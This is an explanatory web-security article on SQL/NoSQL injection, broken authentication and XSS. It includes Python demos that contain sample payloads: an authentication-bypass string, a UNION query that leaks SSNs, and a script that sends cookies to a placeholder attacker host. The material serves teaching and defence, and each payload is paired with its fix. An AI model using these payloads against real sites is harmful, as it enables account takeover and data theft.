The Internet has brought great value to our lives. It lets us communicate across the globe in the blink of an eye using instant messaging. It gives us platforms, accessible from any device, anywhere, to run our lives from and has pulled human knowledge together in a way never seen before in history.
With great advances come great problems, and the basic architecture that the Internet is built on, distributed and interconnected, has opened up new channels that cybercriminals can exploit.
Web based attacks are now the mainstay of the cybercrime professional. I use the term professional purposely, because the days of the opportunist hacker are gone, and now organized, often state sponsored, cybercrime is what we find ourselves up against.
This article will look at just a few of the most popular web based attacks that we need to be aware of, so that we can form a robust and effective security strategy, and at the most modern approaches to dealing with these sorts of threats.
Web Attack 1: The Attack of the Killer Databases
The database is a fundamental architectural component of the web. Databases store the building block of the Internet: information. This information can be anything from social security numbers to login credentials. Web databases are at risk from an attack type known as an 'injection attack'. Veracode has identified SQL injection as being among the most prevalent types of web attack.
There are two basic types of database, SQL and NoSQL based systems, and both are at risk from injection attacks. In an attack against a web database, the hacker takes advantage of an input field on your website's user interface whose contents are used to build a database query. An example of such a field is a username or password entry field (the query runs when the submit button is clicked). Instead of entering a plain username or password, the hacker enters text containing SQL syntax, such as a closing quote followed by OR 1=1 or a UNION SELECT clause (or, in the case of a NoSQL database, a JSON document containing query operators such as $gt or $ne where a plain string was expected). Because the application pastes the input straight into the query text, the database parses the attacker's characters as part of the command rather than as a value such as a username, and executes them. Cybercriminals use injection attacks against databases to export data such as Personally Identifiable Information (PII), delete accounts, create bogus accounts and modify data. Injection attacks can even be used to initiate a Denial of Service (DoS) attack, for example by dropping tables or issuing queries that tie up the server.
Ensuring that a database is secured against such attacks is very important for an organization, as security and privacy breaches cost money, reputation and time. Methods and tools exist to prevent this type of attack. The most effective is to send the query text and the user-supplied values to the database separately (parameterized queries, also called prepared statements), so that the input can never be parsed as SQL; storing the query in the database and 'filling in the blanks' with parameters (stored procedures) achieves the same thing, provided the procedure does not build dynamic SQL from its arguments internally. Validating input against an expected format, and running the application under a database account with the least privilege it needs, limit what a successful injection can do. Tools such as Web Application Firewalls (WAF) are also an integral part of the defensive stance that can be taken against SQL injection, although a WAF is a filter in front of the application rather than a fix for the underlying query construction. According to the Ponemon Institute, roughly two thirds of the U.S. organizations it surveyed had been breached via a SQL injection attack in 2013. The same report found that 88% of respondents favored using behavioral analysis, such as a WAF with analysis capabilities, to prevent attacks.
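To make the mechanism concrete, here is an added Python example (not code from the original article or from any of the products it mentions) using an in-memory SQLite database with constructed sample rows. It shows the same login query built by string formatting and by parameter binding, two classic payloads against the first form, and a type check of the kind that stops operator injection in a JSON login body aimed at a document store. The table, users and payloads are all assumptions for the demo; passwords are stored in the clear only to keep it short.

```python
import json
import sqlite3


def make_demo_db():
    """Build an in-memory SQLite database with constructed sample rows (not real data).
    Cleartext passwords are used only to keep the demo short; real systems store salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "123-45-6789"),
         ("bob", "hunter2", "987-65-4321")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting: the attacker's text becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the values separately
    from the SQL text, so quotes, comments and UNION in the input stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Two classic payloads typed into the username field (constructed for the demo).
BYPASS = "' OR '1'='1' --"                  # closes the string, adds a true clause, comments out the password check
EXFIL = "' UNION SELECT ssn FROM users --"  # appends a second SELECT that leaks a different column


def nosql_credentials_are_plain_strings(body):
    """Guard against operator injection in a JSON login body aimed at a document store:
    {"password": {"$gt": ""}} would match every non-empty password if it were passed
    straight into a query filter. Only the two expected keys, both plain strings, pass."""
    data = json.loads(body)
    return (isinstance(data, dict)
            and set(data) == {"username", "password"}
            and all(isinstance(data[k], str) for k in data))


if __name__ == "__main__":
    conn = make_demo_db()
    print(login_vulnerable(conn, BYPASS, "wrong"))              # ['alice', 'bob']: logged in as everyone
    print(login_vulnerable(conn, EXFIL, "wrong"))               # the two SSNs, not usernames at all
    print(login_parameterized(conn, BYPASS, "wrong"))           # []: the payload is just an odd username
    print(login_parameterized(conn, "alice", "correct horse"))  # ['alice']
    print(nosql_credentials_are_plain_strings(
        '{"username": "alice", "password": {"$gt": ""}}'))      # False
```

Note that the parameterized version needs no escaping or blacklist of its own: the payloads are simply looked up as literal usernames and match nothing.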
One of the most famous series of SQL injection attacks is that carried out by Albert Gonzalez and his associates against payment processors and retailers, including Heartland Payment Systems, rather than against bank ATMs themselves; it resulted in around 170 million credit and debit card numbers being compromised. More recently, SAP was affected by a SQL injection flaw that allowed control of one of its medical applications. SQL injection is a massive headache for any company that has a database behind a web interface.
Web Attack 2: If it Ain’t broke…
Broken authentication and session management are areas of weakness that can become a hacker's dream. In fact, this type of web vulnerability holds position number two in the OWASP Top Ten list of web application risks (A2 in the 2013 edition).
Authentication can be broken in a number of ways, including:
- Brute force attacks: Poor quality authentication, such as easily guessable passwords and usernames, needs to be avoided. Creating a password or username policy that gives strength but retains usability is one of the simplest but most effective tools you can use against this kind of brute force attack; pair it with throttling or temporary lockout of an account after repeated failed logins, so that online guessing is slow as well as unlikely to succeed.
- Interception of unencrypted traffic: This is easier than it sounds. There are legitimate devices available, used by penetration testers and costing less than $100, that allow a person to intercept unencrypted traffic. Man in the Middle (MitM) attacks can easily occur in which a user's login details and their Session ID are captured, allowing a cybercriminal to impersonate that user. SSL/TLS encryption must be used across every exposed part of a web application, especially where the site collects user details, and the session cookie should carry the Secure flag so the browser never sends it over plain HTTP.
- Poorly implemented session management: HTTP is stateless, so nothing is carried between page requests. In more complex web applications, i.e. those that require login credentials, there needs to be a mechanism to carry the logged-in state between pages (so the user remains logged in across the site), usually a Session ID in a cookie. Poor implementation in this area, for example creating predictable Session IDs from a counter or timestamp, keeping the same ID before and after login, or never expiring sessions, can result in session hijacking, where the attacker presents a stolen or guessed Session ID and is treated as that user without ever learning their password. Session IDs should come from a cryptographically secure random generator, be replaced at login, expire after inactivity and be marked HttpOnly.
- Phishing: Phishing, and especially spear phishing, is becoming the weapon of choice for cybercriminals seeking login credentials. It is often used, to great effect, to steal privileged administrator access, the consequences of which we are all aware of from the numerous news articles on major data breaches in recent years. Implementing a second authentication factor can mitigate this risk, since a phished password alone is then not enough to log in.
- Account recovery: Designing and building secure yet usable account recovery mechanisms into your web application is vital to prevent abuse of login credentials. This was exemplified by the celebrity hack of 2014, in which intimate photos were disclosed after cybercriminals were able to access users' accounts through a flawed credential recovery process. Designing the system to require a second layer of verification before a credential reset is vital in combating this type of exploit.
Authentication is one of the most difficult aspects of web application security to get right. It has multiple facets of implementation, including encryption of transmission, predictable login credentials and session management. All of these considerations can be managed with the right measures in place: for example, setting a usable password policy, adding a second factor and ensuring that encryption is properly implemented. Deploying a reverse proxy that provides secure authentication and session management in front of the application is probably the easiest and most robust solution against this type of web attack.
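The session and brute force points above, as an added Python example (not code from the original article or from any reverse proxy product): a minimal in-memory session store that issues IDs from the operating system's CSPRNG, rotates the ID at login, expires idle sessions and sets the cookie flags; a per-account throttle for failed logins; and a constant-time password comparison. The class and function names, the timeouts and the injected clock are assumptions made for the example.

```python
import hmac
import secrets
import time


class SessionStore:
    """In-memory session store. Session IDs come from the OS CSPRNG (never a counter
    or timestamp), a fresh ID is issued at login so an ID planted before login cannot
    be fixed by an attacker, and idle sessions expire. The clock is injectable so the
    timeout can be exercised without waiting."""

    IDLE_TIMEOUT = 15 * 60  # seconds; an assumed value for the example

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock

    def create(self, username):
        sid = secrets.token_urlsafe(32)  # 256 bits of entropy, URL-safe base64
        self._sessions[sid] = {"user": username, "last_seen": self._clock()}
        return sid

    def lookup(self, sid):
        """Return the user for a valid session, or None if unknown or idle too long."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self._clock() - entry["last_seen"] > self.IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        entry["last_seen"] = self._clock()
        return entry["user"]

    def rotate(self, old_sid, username):
        """Replace the pre-login session with a fresh ID (defeats session fixation)."""
        self._sessions.pop(old_sid, None)
        return self.create(username)

    def destroy(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: Secure keeps it off plain HTTP (no capture by a MitM on
    cleartext), HttpOnly keeps it away from page script (limits XSS cookie theft),
    SameSite=Lax keeps it off most cross-site requests."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


class LoginThrottle:
    """Per-account failed-attempt counter with a temporary lockout, the complement
    to a password policy against online brute force."""

    def __init__(self, max_failures=5, lockout_seconds=300, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._clock = clock
        self._failures = {}  # username -> (count, time of first failure in this window)

    def allowed(self, username):
        count, since = self._failures.get(username, (0, 0))
        if count < self.max_failures:
            return True
        if self._clock() - since > self.lockout_seconds:
            del self._failures[username]  # lockout has expired
            return True
        return False

    def record(self, username, success):
        if success:
            self._failures.pop(username, None)
            return
        count, since = self._failures.get(username, (0, self._clock()))
        self._failures[username] = (count + 1, since)


def verify_password(stored, supplied):
    """Constant-time comparison so response timing does not leak how many leading
    characters matched. Real systems compare salted hashes; cleartext is used here
    only to keep the example short."""
    return hmac.compare_digest(stored.encode(), supplied.encode())
```

Typical flow: `create` a session for the anonymous visitor, check `LoginThrottle.allowed` before verifying the password, call `rotate` on success and `record` on every attempt, and send `session_cookie` with the new ID.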
Web Attack 3: The Big X…SS
Cross Site Scripting, or XSS, is a variant of the injection attack. In this case, malicious JavaScript is injected not into the database engine but into the web pages the site serves: user-supplied text that the application writes into its HTML without encoding is interpreted by other users' browsers as script, running with the site's own privileges. The malicious code can arrive through anything from a blog comment (stored in the back end database and replayed to every visitor), to a crafted link whose parameters are echoed back in the page (reflected XSS), to an ad or video embedded in the site. It is a very popular method of attack, as it can be used to distribute malware, hijack a user's session, display illegitimate content, or steal session cookies and users' login credentials.
As more people become aware of SQL injection attacks and close off that route, cybercriminals will make more use of XSS.
The use of a WAF to prevent XSS is a good strategy, but it must be deployed across all domains and sub-domains to be effective; otherwise an XSS exploit will just find another route in, and you cannot leave any door unlocked. A WAF is a compensating control, though: the underlying fix is to encode every piece of untrusted data for the HTML context it lands in, and to send a Content-Security-Policy header so that inline script the application did not intend to serve is not executed. The Open Web Application Security Project (OWASP) lists XSS as number three in its Top Ten list of web application vulnerabilities.
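As an added Python example (not the article's own code), here is the vulnerable and the hardened rendering of a blog comment, a URL attribute check that entity encoding alone does not cover, and a Content-Security-Policy header with a per-response nonce. The comment payload, the attacker host and the function names are constructed for the demo.

```python
import html
import re
import secrets

# Constructed stored-XSS payload, as it might be submitted in a comment form.
# The host is a placeholder in the reserved .example domain, not a real site.
COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(author, body):
    """Interpolates user-controlled text straight into the HTML: every visitor's
    browser parses the payload as a live <script> element."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    """Output encoding for the HTML text context: <, >, &, \" and ' become entities,
    so the browser shows the payload as text instead of running it."""
    return (f"<p><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</p>")


def render_link_safe(url):
    """Attribute/URL context needs more than entity encoding: a javascript: URL
    survives html.escape unchanged and still runs on click, so the scheme is
    restricted first and the value is then entity-encoded for the attribute."""
    if not re.match(r"^https?://", url, re.IGNORECASE):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'


def csp_header(nonce):
    """Content-Security-Policy that blocks inline script unless it carries the
    per-response nonce, and blocks plugins and <base> hijacking; a second layer
    for the place where encoding was missed."""
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'self' 'nonce-{nonce}'; object-src 'none'; base-uri 'none'")


def new_nonce():
    """Fresh, unguessable nonce for each response; reuse would let an injected
    script copy it."""
    return secrets.token_urlsafe(16)


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(markup):
    """True if the markup still contains a real <script> start tag (encoded
    &lt;script&gt; does not count)."""
    return _SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", COMMENT))
    print(render_comment_safe("mallory", COMMENT))
    print(render_link_safe("javascript:alert(1)"))
    print(csp_header(new_nonce()))
```

The same input needs different treatment depending on where it lands (text node, attribute, URL, JavaScript string); `html.escape` covers the first two only, which is why the link helper checks the scheme as well.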
A newer vector for such attacks is known as malvertising. Malvertising is where a cybercriminal uses an online ad or video to deliver malicious code onto a user's machine by exploiting vulnerabilities in a browser or in software like Adobe Flash. It is becoming an increasing problem: Google's DoubleClick network was recently hit, and Google has had to purge over 350 million 'bad ads' from its network. Malicious ad code is now often combined with a 'drive-by download', where a user is automatically redirected (no user intervention needed) to a malicious site when an infected ad loads. The drive-by download uses an exploit kit such as Angler, which probes the user's browser and plugins for unpatched vulnerabilities and uses them to infect the PC with malware.
Keeping Control of Web Attacks
The above three types of web application attack are part of a complex mix of vectors and actors that takes advantage of software vulnerabilities, injection methods and social engineering. This list is by no means exhaustive; many other attack methods exist and new ones will no doubt surface. Many attacks on web applications require some form of user interaction to initiate them, whether simply using the UI of a website or responding to phishing emails that trick a user into navigating to a spoofed site. The human touch points should always be acknowledged in any analysis of web based attacks.
Web application threats are part of our everyday experience of an open Internet, one that brings multiple services together for the general good. But we can stifle these threats through awareness, education and the right defensive measures, such as those explored above. Modern tools like Web Application Firewalls, properly implemented credential policies and a second factor are an intrinsic part of the defense of our open Web, and can help towards a more secure environment not just for our organization but for anyone who interacts with our services.